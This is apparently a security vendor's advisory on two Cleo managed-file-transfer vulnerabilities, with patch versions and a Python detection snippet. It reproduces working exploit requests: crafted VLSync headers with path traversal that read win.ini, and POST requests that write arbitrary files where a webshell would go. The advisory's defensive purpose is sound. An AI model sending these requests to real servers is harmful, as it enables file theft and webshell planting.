[2024.12 Vulnerability Report] Cleo Harmony, VLTrader and LexiCom File Read/Write Vulnerability | Cloud-Based Platform AIONCLOUD


Vulnerability report written by the TA team, based on its analysis of the "Cleo Harmony, VLTrader and LexiCom File Read/Write Vulnerability"


The vulnerability is a file read/write vulnerability in software provided by Cleo: a manipulated VLSync header lets an attacker read files from, or upload malicious files to, a service running that software.

The vulnerabilities were patched in Harmony, VLTrader, LexiCom 5.8.0.21 and 5.8.0.24, and AIWAF is continuously monitoring related vulnerabilities.


1. Overview

Cleo is a software vendor that offers managed file transfer solutions, including the products Harmony, VLTrader, and LexiCom. This report summarizes our analysis of CVE-2024-50623 and CVE-2024-55956, file read and write vulnerabilities in that software.


Source: https://www.helpnetsecurity.com/2024/12/10/cve-2024-50623-cleo-file-transfer-software-vulnerabilities-exploited/


2. Attack Type

CVE-2024-50623 is a file read and write vulnerability in Cleo Harmony, VLTrader, and LexiCom. It leverages weak validation in the /Synchronization endpoint, which handles file synchronization, to either fetch arbitrary file data by sending a crafted VLSync header or write arbitrary files by sending malicious webshell content.

Reading the win.ini file using a GET request:

GET /Synchronization HTTP/1.1
Host: www.test.com
VLSync: Retrieve;l=Ab1234-RQ0258;n=VLTrader;v=5.7.0.0;a=1337;po=1337;s=True;b=False;pp=myEncryptedPassphrase;path=..\..\..\windows\win.ini
Content-Type: multipart/form-data; boundary=---------------------------12345678901234567890123456
Content-Length: 0

Generating a test.txt file using a POST request:

POST /Synchronization HTTP/1.1
Host: www.test.com
VLSync: ADD;l=Ab1234-RQ0258;n=VLTrader;v=5.7.0.0;a=1337;po=1337;s=True;b=False;pp=myEncryptedPassphrase;path=..\..\..\test.txt
Content-Type: multipart/form-data; boundary=-----1337
Content-Length: 14

cve-2024-50623

CVE-2024-55956 is a file write vulnerability found in the version patched for CVE-2024-50623. It allows malicious webshell content to be written to arbitrary files by sending a request with the VLSync: Multipart;l=0,Acknowledge header.

However, this vulnerability differs from CVE-2024-50623 in that it only allows file writes, not reads.

Creating a temp/hax.txt file using a POST request:

POST /Synchronization HTTP/1.1
Host: 192.168.86.50:5080
Connection: close
Content-Type: application/form-data;boundary=--------boundary
VLSync: Multipart;l=0,Acknowledge
Content-Length: 119

VLSync: ReceivedReceipt;service="AS2";msgId=12345;path="temp/hax.txt";receiptfolder=Unspecified;
--------boundary
<Malware code>

3. Response

CVE-2024-50623 is addressed in the Harmony, VLTrader, and LexiCom 5.8.0.21 patches, and CVE-2024-55956 is addressed in the Harmony, VLTrader, and LexiCom 5.8.0.24 patches.

Both vulnerabilities are triggered by a request carrying a crafted VLSync header; this request shape will be further analyzed and handled as a detection pattern in our AIWAF products.
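As an added illustration (not part of this report and not AIWAF's own rule logic), the following Python snippet flags the two request shapes shown in section 2: a VLSync header on /Synchronization whose path= parameter escapes the sync folder (CVE-2024-50623) and the Multipart;l=0,Acknowledge header (CVE-2024-55956). The sample requests are constructed from the headers quoted above; the helper names are our own.

```python
import re
from typing import Optional

# Constructed sample requests modelled on the two shapes shown in this report.
READ_REQ = r"""GET /Synchronization HTTP/1.1
Host: www.test.com
VLSync: Retrieve;l=Ab1234-RQ0258;n=VLTrader;v=5.7.0.0;path=..\..\..\windows\win.ini

"""
WRITE_REQ = r"""POST /Synchronization HTTP/1.1
Host: 192.168.86.50:5080
VLSync: Multipart;l=0,Acknowledge
Content-Length: 0

"""
BENIGN_REQ = r"""GET /Synchronization HTTP/1.1
Host: www.test.com
VLSync: Retrieve;l=Ab1234-RQ0258;n=VLTrader;v=5.7.0.0;path=inbox/report.csv

"""

# "../" or "..\" as a complete path segment anywhere in the value.
TRAVERSAL = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")
# The path= parameter inside the semicolon-separated VLSync value.
PATH_PARAM = re.compile(r"(?:^|;)\s*path=\"?([^;\"]+)", re.IGNORECASE)

def parse_request(raw: str):
    """Return (method, target, headers) from the head of a raw HTTP request."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.splitlines()
    method, target = lines[0].split()[:2]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers

def classify(raw: str) -> Optional[str]:
    """Return the CVE id a request matches, or None if it looks benign."""
    _, target, headers = parse_request(raw)
    vlsync = headers.get("vlsync")
    if not target.startswith("/Synchronization") or vlsync is None:
        return None
    compact = vlsync.replace(" ", "").lower()
    # CVE-2024-55956: the Multipart/Acknowledge header that drives the file write.
    if compact.startswith("multipart;") and "acknowledge" in compact:
        return "CVE-2024-55956"
    # CVE-2024-50623: any VLSync operation whose path= escapes the sync folder.
    m = PATH_PARAM.search(vlsync)
    if m and TRAVERSAL.search(m.group(1)):
        return "CVE-2024-50623"
    return None
```

A production rule would additionally inspect the multipart body of the CVE-2024-55956 request, where the second VLSync line names the written file.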


4. Conclusion

Cleo Harmony, VLTrader, and LexiCom power managed file transfer (MFT) solutions used by many large enterprises. With CISA warning that these vulnerabilities are being actively leveraged in ransomware attacks, customers and enterprises running this software should update to the latest versions as soon as possible.

Our AIWAF product continues to monitor for vulnerabilities in software provided by Cleo and will continue to respond quickly to any related vulnerabilities that are discovered.

